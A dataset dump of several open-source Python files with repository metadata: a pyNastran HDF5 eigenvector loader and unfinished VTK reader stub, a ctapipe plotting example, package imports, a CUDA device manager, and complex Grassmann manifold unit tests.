assert se == 0, se
assert afpm == 0, afpm
assert trmc == 0, trmc
assert inst == 0, inst
assert module == 0, module
iresults = np.full(len(idomain), np.nan, dtype='int32')
is_freq = np.abs(eigr).max() != 0 or np.abs(eigi).max() != 0
is_modes = mode.max() != 0
step_type = ''
for itime, subcasei, analysis_codei, modei, eigri, eigii, idomaini, positioni, lengthi in zip(count(), subcase, analysis_code, mode, eigr, eigi, idomain, position, length):
if subcasei in subcases:
subcase = subcases[subcasei]
if 'ANALYSIS' in subcase:
analysisi = subcase['ANALYSIS'][0]
step_type = f' ({analysisi})'
else:
print('preload step?')
else:
print(f'what is subcase {subcasei}?')
i0 = positioni
i1 = positioni + lengthi
#name = f'{basename}_subcase={subcasei:d}; mode={modei:d}; freq={eigri}'
basename = f'{basename_orig}'
name = _get_eigenvector_name(basename, subcasei, analysis_codei, modei, eigri, eigii,
is_modes, is_freq)
#name = f'{basename}: subcase={subcasei:d}; mode={modei:d}; freq={eigri}'
print(name)
#print(itime, domain, positioni, lengthi)
# make it so we can determine the other "times"
iresults[itime] = iresult
_domain = DOMAIN[i0]
__domain = _domain # # DOMAIN[i0:i1]
_nids = NID[i0:i1]
assert len(_nids) == len(ids)
if solver == 'msc':
results[iresult] = RealVectorTable(
name, itime, iresult, iresults,
_domain, position, length,
_nids,
TX[i0:i1], TY[i0:i1], TZ[i0:i1],
RX[i0:i1], RY[i0:i1], RZ[i0:i1],
_domain, 'node')
elif solver == 'optistruct':
results[iresult] = RealVectorTableOptistruct(
name, itime, iresult, iresults,
_domain, position, length,
_nids,
VALUE[i0:i1, :],
#VALUE[i0:i1, 3:],
#VALUE[i0:i1, :3],
_domain, location='node')
else:
raise NotImplementedError(solver)
iresult += 1
return iresult
def load_eigenvector_complex(basename: str,
iresult: int,
results: Dict[int, Function],
domains_df: pd.DataFrame,
group: h5py._hl.dataset.Dataset,
index: h5py._hl.dataset.Dataset,
ids: np.ndarray,
geom_model: BDF,
model: OP2,
subcases: Optional[List[int]]=None) -> int:
basename += ' (complex)'
# TODO: check real/imaginary or magnitude/phase
#'ID', 'X', 'Y', 'Z', 'RX', 'RY', 'RZ', 'DOMAIN_ID',
#'DOMAIN_ID', 'POSITION', 'LENGTH'
INDEX_DOMAIN = index['DOMAIN_ID']
INDEX_POSITION = index['POSITION']
INDEX_LENGTH = index['LENGTH']
NID = group['ID']
names = group.dtype.names
if 'X' in names:
TX = group['XR'] + group['XI'] * 1j
TY = group['YR'] + group['YI'] * 1j
TZ = group['ZR'] + group['ZI'] * 1j
RX = group['RXR'] + group['RXI'] * 1j
RY = group['RYR'] + group['RYI'] * 1j
RZ = group['RZR'] + group['RZI'] * 1j
solver = 'msc'
#elif 'VALUE' in names:
#asdf
else:
raise NotImplementedError(str(names))
DOMAIN = group['DOMAIN_ID']
# what are the subcases...
#udomains = np.unique(DOMAIN)
#all_data = np.stack([X, Y, Z, RX, RY, RZ], axis=1, out=None)
DOMAIN_ID = domains_df['ID']
grouped_df = break_domain_by_case(domains_df, INDEX_DOMAIN)
for tuplei in grouped_df:
indexi, dfi = tuplei
DOMAINs = dfi['ID']
#print(indexi)
#print(dfi)
#print('---------------------')
idomain = np.searchsorted(DOMAINs, INDEX_DOMAIN)
exists = idomain < len(INDEX_DOMAIN)
if not np.all(exists):
if np.any(exists):
raise RuntimeError(idomain)
continue
#idomain = []
#for domain, position, length in zip(INDEX_DOMAIN, INDEX_POSITION, INDEX_LENGTH):
#idomain = (DOMAIN_ID == domain)
#mycase = domains_df.loc[idomain]
position = INDEX_POSITION[idomain]
length = INDEX_LENGTH[idomain]
# ID=1; Analysis=0 -> eigenvalues
# ID SUBCASE STEP ANALYSIS TIME_FREQ_EIGR EIGI MODE DESIGN_CYCLE RANDOM SE AFPM TRMC INSTANCE MODULE
# 0 1 0 0 0 0.000000e+00 0.0 0 0 0 0 0 0 0 0
# 1 2 1 0 2 -3.087735e-10 0.0 1 0 0 0 0 0 0 0
# 2 3 1 0 2 -2.082743e-10 0.0 2 0 0 0 0 0 0 0
# 3 4 1 0 2 -1.514309e-10 0.0 3 0 0 0 0 0 0 0
subcase = dfi['SUBCASE']
analysis_code = dfi['ANALYSIS']
eigr = dfi['TIME_FREQ_EIGR']
eigi = dfi['EIGI']
mode = dfi['MODE']
step = dfi['STEP'].values[0]
design_cycle = dfi['DESIGN_CYCLE'].values[0]
random = dfi['RANDOM'].values[0]
se = dfi['SE'].values[0]
afpm = dfi['AFPM'].values[0]
trmc = dfi['TRMC'].values[0]
inst = dfi['INSTANCE'].values[0]
module = dfi['MODULE'].values[0]
assert step in [0, 1], step
assert design_cycle == 0, design_cycle
assert random == 0, random
assert se == 0, se
assert afpm == 0, afpm
assert trmc == 0, trmc
assert inst == 0, inst
assert module == 0, module
iresults = np.full(len(idomain), np.nan, dtype='int32')
is_freq = np.abs(eigr).max() != 0 or np.abs(eigi).max() != 0
for itime, subcasei, analysis_codei, modei, eigri, eigii, idomaini, positioni, lengthi in zip(count(), subcase, analysis_code, mode, eigr, eigi, idomain, position, length):
#for itime, idomaini, positioni, lengthi in zip(count(), idomain, position, length):
i0 = positioni
i1 = positioni + lengthi
name = _get_name(basename, is_freq, subcasei, analysis_codei, modei, eigri, eigii)
print(name)
#print(itime, domain, positioni, lengthi)
# make it so we can determine the other "times"
iresults[itime] = iresult
_domain = DOMAIN[i0]
if solver == 'msc':
results[iresult] = RealVectorTable(
name, itime, iresult, iresults,
_domain, position, length,
NID[i0:i1],
TX[i0:i1], TY[i0:i1], TZ[i0:i1],
RX[i0:i1], RY[i0:i1], RZ[i0:i1],
DOMAIN[i0:i1], location='node')
elif solver == 'optistruct':
results[iresult] = RealVectorTableOptistruct(
name, itime, iresult, iresults,
_domain, position, length,
NID[i0:i1],
VALUE[i0:i1, :],
#VALUE[i0:i1, 3:],
#VALUE[i0:i1, :3],
DOMAIN[i0:i1], location='node')
else:
raise NotImplementedError(solver)
iresult += 1
return iresult
def _get_eigenvector_name(basename, subcasei, analysis_codei, modei, eigri, eigii,
is_modes, is_freq):
if modei == 0: # static?
if is_freq:
name = f'{basename}: subcase={subcasei:d}; freq={eigri:g}'
else:
name = f'{basename}: subcase={subcasei:d}'
elif analysis_codei == 0: # ???
name = f'{basename}: subcase={subcasei:d}; static? mode={modei:d}; eigr={eigri:g}; eigi={eigii:g}'
elif analysis_codei == 2: # modes?
if is_modes:
name = f'{basename}: subcase={subcasei:d}; mode={modei:d}; freq={eigri:g}'
else:
raise NotImplementedError(analysis_codei)
elif analysis_codei == 8: # buckling (pre?/post?)
# we left off eigr/eigi...(eigr=0; eigi!=0)
name = f'{basename}: subcase={subcasei:d}; buckling mode={modei:d}; load_factor={eigri:g}; eigi={eigii:g}'
elif analysis_codei == 9: # loadstep?
# we left off eigr/eigi...(eigr=0; eigi!=0)
name = f'{basename}: subcase={subcasei:d}; loadstep? mode={modei:d}; eigi={eigii:g}'
else:
raise NotImplementedError(analysis_codei)
return name
def _get_name(basename: str, is_freq: bool, subcasei, analysis_codei, modei, eigri, eigii):
if modei == 0: # static
if is_freq:
name = f'{basename}: subcase={subcasei:d}; freq={eigri:g}; eigi={eigii:g}'
else:
name = f'{basename}: subcase={subcasei:d}'
raise NotImplementedError(analysis_codei)
elif analysis_codei == 9:
# we left off eigr/eigi...(eigr=0; eigi!=0)
name = f'{basename}: subcase={subcasei:d}; loadstep? mode={modei:d} eigi={eigii:g}'
#raise NotImplementedError(analysis_codei)
else:
raise NotImplementedError(analysis_codei)
#name = f'{basename}: subcase={subcasei:d}; mode={modei:d}; freq={eigri}'
#name = f'Eigenvector_subcase={subcasei:d}; mode={modei:d}; freq={eigri:g} eigi={eigii:}'
return name
class vtkNastranReader(vtk.vtkPolyDataAlgorithm):
"""
References
----------
https://kitware.github.io/paraview-docs/latest/python/paraview.simple.VisItNASTRANReader.html
https://github.com/Kitware/VTK/blob/master/IO/Geometry/vtkSTLReader.cxx
https://vtk.org/Wiki/VTK/Tutorials/New_Pipeline
https://vtk.org/Wiki/ParaView/Examples/Plugins/Reader
https://vtk.org/Wiki/VTK/Examples/Python/STLReader
https://gitlab.kitware.com/paraview/paraview/-/blob/master/Examples/Plugins/PythonAlgorithm/PythonAlgorithmExamples.py
https://gitlab.kitware.com/paraview/visitbridge/-/blob/master/databases/readers/NASTRAN/NASTRANPluginInfo.C
https://vtk.org/Wiki/VisIt_Database_Bridge
https://blog.kitware.com/developing-hdf5-readers-using-vtkpythonalgorithm/
"""
def __init__(self):
vtk.vtkPolyDataAlgorithm.__init__(self)
self.filename = None
self.model = pyNastranH5()
def SetFileName(self, char_filename: str):
self.filename = char_filename
self.model.read_h5_nastran(self.filename)
def GetFileName(self) -> str:
return self.filename
def IsFilePolyData(self) -> int:
return 0
def IsFileStructuredGrid(self) -> int:
return 0
def IsFileUnstructuredGrid(self) -> int:
return 1
def IsFileRectilinearGrid(self) -> int:
return 0
def RequestData(unused_request: vtk.vtkInformation,
unused_inputVector: vtk.vtkInformationVector,
unused_outputVector: vtk.vtkInformationVector) -> int:
#vtkInformation* outInfo = outputVector->GetInformationObject(0)
#vtkPolyData* output = vtkPolyData::SafeDownCast(outInfo->Get(vtkDataObject::DATA_OBJECT()))
## All of the data in the first piece.
#if (outInfo->Get(vtkStreamingDemandDrivenPipeline::UPDATE_PIECE_NUMBER()) > 0):
#return 0
raise NotImplementedError()
def GetSTLFileType(filename: str) -> int:
ft = vtk.vtksys.SystemTools.DetectFileType(filename)
#ft = vtksys::SystemTools::DetectFileType(filename)
#vtksys::SystemTools::FileTypeEnum
if ft == 0: # vtksys::SystemTools::FileTypeBinary:
return VTK_BINARY
elif ft == 1: # vtksys::SystemTools::FileTypeText:
return VTK_ASCII
elif ft2 == 2: # vtksys::SystemTools::FileTypeUnknown:
vtkWarningMacro("File type not recognized; attempting binary")
return VTK_BINARY
else:
raise RuntimeError("Case not handled, file type is %s" % ft)
return VTK_BINARY; # should not happen
def PrintSelf(file_obj, indent: vtk.vtkIndent):
self.Superclass.PrintSelf(file_obj, indent)
msg = indent + "Merging: " + ("On\n" if self.Merging else "Off\n")
msg += indent + "ScalarTags: " + ("On\n" if self.ScalarTags else "Off\n")
msg += indent + "Locator: "
file_obj.write(msg)
if self.Locator:
asfd
#self.Locator.PrintSelf(os << endl, indent.GetNextIndent());
else:
print('(none)\n')
def ProcessRequest(request: vtk.vtkInformation,
inputVector: vtk.vtkInformationVector,
outputVector: vtk.vtkInformationVector) -> int:
raise NotImplementedError()
def ReadHeader(char_fname: str='') -> int:
"""Read the header of a vtk data file. More..."""
raise NotImplementedError()
def ReadCellData(ds: vtk.vtkDataSet, numCells: vtk.vtkIdTypeArray):
"""Read the cell data of a vtk data file. More..."""
raise NotImplementedError()
def ReadPointData(ds: vtk.vtkDataSet, numPts: vtk.vtkIdTypeArray) -> int:
"""Read the point data of a vtk data file. More..."""
raise NotImplementedError()
def ReadPointCoordinates(vtkPointSet_ps, numCells: vtk.vtkIdTypeArray) -> int:
"""Read point coordinates. More..."""
raise NotImplementedError()
def ReadPointCoordinates(g: vtk.vtkGraph, numPts: vtk.vtkIdTypeArray) -> int:
"""Read point coordinates. More..."""
raise NotImplementedError()
def ReadVertexData(g: vtk.vtkGraph, numVertices: vtk.vtkIdTypeArray) -> int:
"""Read the vertex data of a vtk data file. More..."""
raise NotImplementedError()
def ReadEdgeData(g: vtk.vtkGraph, numEdges: vtk.vtkIdTypeArray) -> int:
"""Read the edge data of a vtk data file. More..."""
raise NotImplementedError()
def ReadRowData(t: vtk.vtkTable, numEdges: vtk.vtkIdTypeArray) -> int:
"""Read the row data of a vtk data file. More..."""
raise NotImplementedError()
def ReadCells(vtkCellArray, cellArray) -> int:
raise NotImplementedError()
# ------------------------------------------------------------
# Data Descriptors
def CellArrayStatus(self):
"""This property lists which cell-centered arrays to read."""
raise NotImplementedError()
#def FileName(self):
#"""The list of files to be read by the reader."""
def MaterialStatus(self):
"""Select the materials to be loaded from the dataset, if any."""
raise NotImplementedError()
def MeshStatus(self):
"""Select the meshes to be loaded from the dataset, if any."""
raise NotImplementedError()
def PointArrayStatus(self):
"""This property lists which point-centered arrays to read."""
raise NotImplementedError()
def TimestepValues(self):
"""Available timestep values."""
raise NotImplementedError()
# ------------------------------------------------------------
# Data Descriptors
def CellData(self):
"""Returns cell data information"""
raise NotImplementedError()
def FieldData(self):
"""Returns field data information"""
raise NotImplementedError()
def PointData(self):
"""Returns point data information"""
raise NotImplementedError()
# ------------------------------------------------------------
# Methods
def FileNameChanged(self):
"""Called when the filename of a source proxy is changed."""
raise NotImplementedError()
def GetCellDataInformation(self):
"""Returns the associated cell data information."""
raise NotImplementedError()
def GetDataInformation(self, idx=None):
"""This method returns a DataInformation wrapper around a vtkPVDataInformation"""
raise NotImplementedError()
def GetFieldDataInformation(self):
"""Returns the associated cell data information."""
raise NotImplementedError()
def GetPointDataInformation(self):
"""Returns the associated point data information."""
raise NotImplementedError()
def UpdatePipeline(self, time=None):
"""This method updates the server-side VTK pipeline and the associated data information. Make sure to update a source to validate the output meta-data."""
raise NotImplementedError()
def UpdatePipelineInformation(self):
"""This method updates the meta-data of the server-side VTK pipeline and the associated information properties"""
raise NotImplementedError()
def run():
reader = vtk.vtkDataSetReader()
reader.SetFileName("bunny-0.1.vtk")
reader.ReadAllVectorsOn()
reader.ReadAllScalarsOn()
reader.Update()
data = reader.GetOutput()
calc = vtk.vtkArrayCalculator()
calc.SetInputData(data)
calc.SetFunction("5")
calc.SetResultArrayName("MyResults")
calc.Update()
# Gives: AttributeError: 'NoneType' object has no attribute 'GetPointData'
#print(calc.GetPolyDataOutput().GetPointData().GetArray("MyResults").getValue(10))
#writer = vtk.vtkUnstructuredGridWriter()
#writer.SetInputData(data)
#writer.SetFileName("Output.vtk")
#writer.Write()
def run2(hdf5_filename: str):
"""
https://github.com/Kitware/VTK/blob/master/IO/Geometry/vtkSTLReader.cxx
https://vtk.org/Wiki/VTK/Examples/Python/STLReader
"""
#vtkSTLReader
reader = vtkNastranReader()
print(reader)
reader.SetFileName(hdf5_filename)
mapper = vtk.vtkPolyDataMapper()
#if vtk.VTK_MAJOR_VERSION <= 5:
#mapper.SetInput(reader.GetOutput())
#else:
mapper.SetInputConnection(reader.GetOutputPort())
actor = vtk.vtkActor()
actor.SetMapper(mapper)
# Create a rendering window and renderer
ren = vtk.vtkRenderer()
renWin = vtk.vtkRenderWindow()
renWin.AddRenderer(ren)
# Create a renderwindowinteractor
iren = vtk.vtkRenderWindowInteractor()
iren.SetRenderWindow(renWin)
# Assign actor to the renderer
ren.AddActor(actor)
# Enable user interface interactor
iren.Initialize()
renWin.Render()
iren.Start()
if __name__ == '__main__':
# tasks
# - figure out nastran hdf5
# - done
# - figure out how to make a vtk reader
# -
# day 1: 3.5
# day 2: 7
# day 3: 3
# day 4: 7
# day 5: 3
# 1/1: day 6: 6
# ---------------------> 29.5 (for basic hdf5 and )
# 1/3: 5 # gui works
#
#
# tasks:
# - superelements?
# - solutions?
# - spoints
# - elements
# - is there enough RAM to store objects?
# - representative model
# - what are your goals once in Paraview/Paravis
model = pyNastranH5()
h5_filenames = [
r'C:\NASA\m4\formats\git\pyNastran\models\sol_101_elements\buckling_solid_shell_bar.h5',
r'C:\NASA\m4\formats\git\pyNastran\models\sol_101_elements\buckling2_solid_shell_bar.h5',
r'C:\NASA\m4\formats\git\pyNastran\models\sol_101_elements\buckling_solid_shell_bar.h5',
r'C:\NASA\m4\formats\git\pyNastran\models\aero\2_mode_flutter\0012_flutter.h5',
r'C:\NASA\m4\formats\git\pyNastran\models\aero\aerobeam.h5',
r'C:\NASA\m4\formats\git\pyNastran\models\aero\cpmopt.h5',
r'C:\NASA\m4\formats\git\pyNastran\models\msc\6+element-nastran-sol103.h5',
r'C:\NASA\m4\formats\git\pyNastran\models\msc\mode_echo.h5',
r'C:\NASA\m4\formats\git\pyNastran\models\msc\ex1.h5',
r'C:\NASA\m4\formats\git\pyNastran\models\sol_101_elements\static_solid_shell_bar.h5',
r'C:\NASA\m4\formats\git\pyNastran\models\elements\static_elements.h5',
r'C:\NASA\m4\formats\git\pyNastran\models\elements\modes_elements.h5',
r'C:\NASA\m4\formats\git\pyNastran\models\elements\time_elements.h5',
r'C:\NASA\m4\formats\git\pyNastran\models\elements\modes_complex_elements.h5',
r'C:\NASA\m4\formats\git\pyNastran\models\elements\freq_elements.h5',
r'C:\NASA\m4\formats\git\pyNastran\models\elements\freq_elements2.h5',
##r'C:\NASA\m4\formats\git\pyNastran\models\elements\loadstep_elements.h5', # no nonlinear examples
r'C:\NASA\m4\formats\git\pyNastran\models\elements\time_thermal_elements.h5',
r'C:\NASA\m4\formats\git\pyNastran\models\bwb\bwb_saero_saved.h5',
r'C:\NASA\m4\formats\git\pyNastran\models\sol200\d200obus.h5',
]
for h5_filename in h5_filenames:
model.read_h5_nastran(h5_filename)
#model = pyNastranH5()
#model.read_h5_nastran(h5_filename)
#run2(h5_filename)
| 49.745736
| 188
| 0.477794
|
9cb6e373edd0c9d596ac328c1e673f344431b351
| 358
|
py
|
Python
|
docs/ctapipe_api/instrument/camerageometry_example.py
|
chaimain/ctapipe
|
ff80cff2daaf56e1d05ea6501c68fd83a9cf79d5
|
[
"BSD-3-Clause"
] | null | null | null |
docs/ctapipe_api/instrument/camerageometry_example.py
|
chaimain/ctapipe
|
ff80cff2daaf56e1d05ea6501c68fd83a9cf79d5
|
[
"BSD-3-Clause"
] | null | null | null |
docs/ctapipe_api/instrument/camerageometry_example.py
|
chaimain/ctapipe
|
ff80cff2daaf56e1d05ea6501c68fd83a9cf79d5
|
[
"BSD-3-Clause"
] | 1
|
2020-05-16T10:23:51.000Z
|
2020-05-16T10:23:51.000Z
|
from ctapipe.instrument import CameraGeometry
from matplotlib import pyplot as plt
geom = CameraGeometry.from_name("LSTCam")
plt.figure(figsize=(8, 3))
plt.subplot(1, 2, 1)
plt.imshow(geom.neighbor_matrix, origin="lower")
plt.title("Pixel Neighbor Matrix")
plt.subplot(1, 2, 2)
plt.scatter(geom.pix_x, geom.pix_y)
plt.title("Pixel Positions")
plt.show()
| 22.375
| 48
| 0.759777
|
7a52ccbba91db29994f48398dfd5a42eb2c8e99a
| 774
|
py
|
Python
|
phasor/base/__init__.py
|
mccullerlp/OpenLoop
|
fe86dc6dec3740d4b6be6b88d8eef8566e2aa78d
|
[
"Apache-2.0"
] | 5
|
2018-02-28T00:43:37.000Z
|
2020-01-21T11:39:15.000Z
|
phasor/base/__init__.py
|
mccullerlp/OpenLoop
|
fe86dc6dec3740d4b6be6b88d8eef8566e2aa78d
|
[
"Apache-2.0"
] | 1
|
2019-09-07T23:15:43.000Z
|
2019-09-07T23:15:43.000Z
|
phasor/base/__init__.py
|
mccullerlp/OpenLoop
|
fe86dc6dec3740d4b6be6b88d8eef8566e2aa78d
|
[
"Apache-2.0"
] | 1
|
2020-08-21T04:42:09.000Z
|
2020-08-21T04:42:09.000Z
|
# -*- coding: utf-8 -*-
"""
"""
from __future__ import division, print_function, unicode_literals
#from phasor.utilities.print import print
from .bases import (
NoiseBase,
CouplerBase,
FrequencyBase,
Element,
RootElement,
SystemElementBase,
PTREE_ASSIGN,
)
from .ports import (
ElementKey,
ClassicalFreqKey,
)
from .frequency import (
Frequency,
)
from .utilities import (
type_test,
)
from .multi_unit_args import (
generate_refval_attribute,
unitless_refval_attribute,
arbunit_refval_attribute,
)
from .pint import (
ureg,
mag1_units,
)
from .simple_units import (
SimpleUnitfulGroup,
ElementRefValue,
)
from .dictionary_keys import (
DictKey,
FrequencyKey,
)
#from .units import ()
| 14.884615
| 65
| 0.692506
|
934cacd93f0211ff70da261c08cd522beccb8ada
| 2,997
|
py
|
Python
|
uninas/training/devices/cuda.py
|
cogsys-tuebingen/uninas
|
06729b9cf517ec416fb798ae387c5bd9c3a278ac
|
[
"MIT"
] | 18
|
2020-11-22T16:03:08.000Z
|
2022-03-15T12:11:46.000Z
|
uninas/training/devices/cuda.py
|
cogsys-tuebingen/uninas
|
06729b9cf517ec416fb798ae387c5bd9c3a278ac
|
[
"MIT"
] | 2
|
2022-01-04T08:10:17.000Z
|
2022-01-05T08:13:14.000Z
|
uninas/training/devices/cuda.py
|
cogsys-tuebingen/uninas
|
06729b9cf517ec416fb798ae387c5bd9c3a278ac
|
[
"MIT"
] | 6
|
2021-03-08T07:08:52.000Z
|
2022-02-24T12:00:43.000Z
|
import GPUtil
import torch
import torch.nn as nn
import torch.backends.cudnn as cudnn
from torch.nn.parallel.scatter_gather import scatter
from uninas.training.devices.abstract import AbstractDevicesManager, AbstractDeviceMover, TensorOrList
from uninas.utils.args import Argument
from uninas.register import Register
class CudaDeviceMover(AbstractDeviceMover):
"""
handle data flow to specific CUDA devices
"""
def empty_cache(self):
"""
empty the cache
"""
torch.cuda.empty_cache()
def _synchronize(self, indices: [int]):
""" make sure all operations are complete """
for i in indices:
torch.cuda.synchronize(i)
def get_usage_dict(self, log_all=False) -> dict:
""" return a dict that logs the usage of the device(s) """
dct = {}
for gpu in GPUtil.getGPUs():
if gpu.id in self._original_indices:
if log_all:
dct['cuda/%d/%s' % (gpu.id, 'memoryTotal')] = gpu.memoryTotal
dct['cuda/%d/%s' % (gpu.id, 'memoryUsed')] = gpu.memoryUsed
dct['cuda/%d/%s' % (gpu.id, 'memoryFree')] = gpu.memoryFree
dct['cuda/%d/%s' % (gpu.id, 'memoryUtil')] = gpu.memoryUtil
return dct
def move_module(self, module: nn.Module) -> nn.Module:
""" move module to the assigned devices """
assert self.get_num_devices() == 1
return module.cuda(device=self.indices[0])
def _move(self, t: TensorOrList) -> TensorOrList:
""" move (nested) tensors to the assigned devices """
return scatter(t, target_gpus=self.indices)[0]
@Register.devices_manager()
class CudaDevicesManager(AbstractDevicesManager):
"""
manage allocation/de-allocation of CUDA devices
"""
_mover_cls = CudaDeviceMover
def __init__(self, seed: int, is_deterministic: bool, num_devices: int,
use_cudnn: bool, use_cudnn_benchmark: bool):
if num_devices < 0:
num_devices = torch.cuda.device_count()
super().__init__(seed, is_deterministic, num_devices)
assert torch.cuda.device_count() >= num_devices,\
"Only %d devices available on the system, requesting %d" % (torch.cuda.device_count(), num_devices)
if num_devices > 0:
torch.cuda.manual_seed_all(seed)
cudnn.set_flags(_enabled=use_cudnn,
_benchmark=use_cudnn_benchmark and not is_deterministic,
_deterministic=is_deterministic)
@classmethod
def args_to_add(cls, index=None) -> [Argument]:
""" list arguments to add to argparse when this class (or a child class) is chosen """
return super().args_to_add(index) + [
Argument('use_cudnn', default='True', type=str, help='try using cudnn', is_bool=True),
Argument('use_cudnn_benchmark', default='True', type=str, help='use cudnn benchmark', is_bool=True),
]
| 39.434211
| 112
| 0.630631
|
8863c965ed051e622c66fdce999024d487eb66ca
| 7,497
|
py
|
Python
|
tests/test_manifolds/test_complex_grassmann.py
|
captain-pool/pymanopt
|
df94ab9e03b5fa3041668defe995d93b8715a6d7
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_manifolds/test_complex_grassmann.py
|
captain-pool/pymanopt
|
df94ab9e03b5fa3041668defe995d93b8715a6d7
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_manifolds/test_complex_grassmann.py
|
captain-pool/pymanopt
|
df94ab9e03b5fa3041668defe995d93b8715a6d7
|
[
"BSD-3-Clause"
] | null | null | null |
import autograd.numpy as np
from numpy import linalg as la
from numpy import random as rnd
from numpy import testing as np_testing
from pymanopt.manifolds import ComplexGrassmann
# from pymanopt.tools import testing
from pymanopt.tools.multi import multieye, multihconj, multiprod, multisym
from .._test import TestCase
class TestSingleComplexGrassmannManifold(TestCase):
def setUp(self):
self.m = m = 5
self.n = n = 2
self.k = k = 1
self.man = ComplexGrassmann(m, n, k=k)
self.proj = lambda x, u: u - x @ x.T @ u
def test_inner(self):
X = self.man.rand()
G = self.man.randvec(X)
H = self.man.randvec(X)
np_testing.assert_almost_equal(
np.real(np.trace(np.conjugate(G.T) @ H)), self.man.inner(X, G, H)
)
assert np.isreal(self.man.inner(X, G, H))
def test_proj(self):
# Test proj(proj(X)) == proj(X)
# and proj(X) belongs to the horizontal space of Stiefel
X = self.man.rand()
U = rnd.randn(self.m, self.n) + 1j * rnd.randn(self.m, self.n)
proj_U = self.man.proj(X, U)
proj_proj_U = self.man.proj(X, proj_U)
np_testing.assert_allclose(proj_U, proj_proj_U)
np_testing.assert_allclose(
multiprod(multihconj(X), proj_U),
np.zeros((self.n, self.n)),
atol=1e-10,
)
def test_norm(self):
X = self.man.rand()
U = self.man.randvec(X)
np_testing.assert_almost_equal(
np.trace(np.conjugate(U.T) @ U), self.man.norm(X, U)
)
assert np.isreal(self.man.norm(X, U))
def test_rand(self):
# Just make sure that things generated are on the manifold
# and that if you generate two they are not equal.
# Test also that matrices are complex.
X = self.man.rand()
np_testing.assert_allclose(
multiprod(multihconj(X), X), np.eye(self.n), atol=1e-10
)
Y = self.man.rand()
assert la.norm(X - Y) > 1e-6
assert np.iscomplex(X).all()
def test_randvec(self):
# Just make sure that things generated are on the horizontal space of
# complex Stiefel manifold
# and that if you generate two they are not equal.
# Test also that matrices are complex.
X = self.man.rand()
G = self.man.randvec(X)
np_testing.assert_allclose(
multiprod(multihconj(X), G), np.zeros((self.n, self.n)), atol=1e-10
)
H = self.man.randvec(X)
assert la.norm(G - H) > 1e-6
assert np.iscomplex(G).all()
def test_dist(self):
X = self.man.rand()
Y = self.man.rand()
np_testing.assert_almost_equal(
self.man.norm(X, self.man.log(X, Y)), self.man.dist(X, Y)
)
def test_exp_log_inverse(self):
X = self.man.rand()
Y = self.man.rand()
U = self.man.log(X, Y)
Z = self.man.exp(X, U)
np_testing.assert_almost_equal(0, self.man.dist(Y, Z), decimal=5)
def test_log_exp_inverse(self):
X = self.man.rand()
U = self.man.randvec(X)
Y = self.man.exp(X, U)
V = self.man.log(X, Y)
# Check that the manifold difference between the tangent vectors u and
# v is 0
np_testing.assert_almost_equal(0, self.man.norm(X, U - V))
def test_retr(self):
# Test that the result is on the manifold and that for small
# tangent vectors it has little effect.
x = self.man.rand()
u = self.man.randvec(x)
xretru = self.man.retr(x, u)
np_testing.assert_allclose(
multiprod(multihconj(xretru), xretru), np.eye(self.n), atol=1e-10
)
u = u * 1e-6
xretru = self.man.retr(x, u)
np_testing.assert_allclose(xretru, x + u)
class TestMultiComplexGrassmannManifold(TestCase):
def setUp(self):
self.m = m = 5
self.n = n = 2
self.k = k = 3
self.man = ComplexGrassmann(m, n, k=k)
def test_dim(self):
assert self.man.dim == self.k * 2 * (self.m * self.n - self.n ** 2)
def test_typicaldist(self):
np_testing.assert_almost_equal(
self.man.typicaldist, np.sqrt(self.n * self.k)
)
def test_inner(self):
X = self.man.rand()
G = self.man.randvec(X)
H = self.man.randvec(X)
np_testing.assert_allclose(
np.real(np.sum(np.conjugate(G) * H)), self.man.inner(X, G, H)
)
assert np.isreal(self.man.inner(X, G, H))
def test_proj(self):
# Test proj(proj(X)) == proj(X) and proj(X)
# belongs to the horizontal space of Stiefel
X = self.man.rand()
U = rnd.randn(self.k, self.m, self.n) + 1j * rnd.randn(
self.k, self.m, self.n
)
proj_U = self.man.proj(X, U)
proj_proj_U = self.man.proj(X, proj_U)
np_testing.assert_allclose(proj_U, proj_proj_U)
np_testing.assert_allclose(
multiprod(multihconj(X), proj_U),
np.zeros((self.k, self.n, self.n)),
atol=1e-10,
)
def test_norm(self):
X = self.man.rand()
U = self.man.randvec(X)
np_testing.assert_almost_equal(self.man.norm(X, U), la.norm(U))
assert np.isreal(self.man.norm(X, U))
def test_rand(self):
# Just make sure that things generated are on the manifold and that
# if you generate two they are not equal.
X = self.man.rand()
np_testing.assert_allclose(
multiprod(multihconj(X), X), multieye(self.k, self.n), atol=1e-10
)
Y = self.man.rand()
assert la.norm(X - Y) > 1e-6
assert np.iscomplex(X).all()
def test_randvec(self):
# Make sure things generated are in tangent space and if you generate
# two then they are not equal.
X = self.man.rand()
U = self.man.randvec(X)
np_testing.assert_allclose(
multisym(multiprod(multihconj(X), U)),
np.zeros((self.k, self.n, self.n)),
atol=1e-10,
)
V = self.man.randvec(X)
assert la.norm(U - V) > 1e-6
assert np.iscomplex(U).all()
def test_dist(self):
X = self.man.rand()
Y = self.man.rand()
np_testing.assert_almost_equal(
self.man.dist(X, Y), self.man.norm(X, self.man.log(X, Y))
)
def test_exp_log_inverse(self):
X = self.man.rand()
Y = self.man.rand()
U = self.man.log(X, Y)
Z = self.man.exp(X, U)
np_testing.assert_almost_equal(0, self.man.dist(Y, Z), decimal=5)
def test_log_exp_inverse(self):
X = self.man.rand()
U = self.man.randvec(X)
Y = self.man.exp(X, U)
V = self.man.log(X, Y)
# Check that the manifold difference between the tangent vectors u and
# v is 0
np_testing.assert_almost_equal(0, self.man.norm(X, U - V))
def test_retr(self):
# Test that the result is on the manifold and that for small
# tangent vectors it has little effect.
x = self.man.rand()
u = self.man.randvec(x)
xretru = self.man.retr(x, u)
np_testing.assert_allclose(
multiprod(multihconj(xretru), xretru),
multieye(self.k, self.n),
atol=1e-10,
)
u = u * 1e-6
xretru = self.man.retr(x, u)
np_testing.assert_allclose(xretru, x + u)
| 31.902128
| 79
| 0.571028
|
da7daffd4aa23dda21fc463dc4a3f0ac4262c187
| 8,620
|
py
|
Python
|
data_generator/generate_data.py
|
g-loot/fourkeys
|
a42ccbe17742e6db958d6c7936d46886f75bb540
|
[
"Apache-2.0"
] | 1
|
2021-09-13T10:03:03.000Z
|
2021-09-13T10:03:03.000Z
|
data_generator/generate_data.py
|
g-loot/fourkeys
|
a42ccbe17742e6db958d6c7936d46886f75bb540
|
[
"Apache-2.0"
] | 1
|
2021-12-17T16:02:25.000Z
|
2021-12-17T16:03:48.000Z
|
data_generator/generate_data.py
